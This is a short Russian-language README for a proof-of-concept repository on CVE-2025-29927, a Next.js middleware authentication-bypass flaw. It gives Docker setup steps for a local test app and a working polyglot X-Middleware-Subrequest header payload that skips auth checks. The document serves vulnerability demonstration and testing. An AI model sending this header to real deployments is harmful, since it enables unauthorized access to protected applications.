
PoC для CVE-2025-29927: уязвимость обхода middleware в Next.js. Демонстрирует, как x-middleware-subrequest может обходить проверки аутентификации. Включает настройку Docker для тестирования.
Этот репозиторий демонстрирует уязвимость CVE-2025-29927 в Next.js, где внутренний заголовок x-middleware-subrequest может использоваться для обхода проверок промежуточного ПО, таких как аутентификация.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Мы можем значительно упростить эксплуатацию этой проблемы, используя полиглот, который позволяет эффективно охватывать различные возможные случаи. Нам удалось добиться этого с помощью следующего HTTP-заголовка, используемого для проверки наличия обхода аутентификации:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

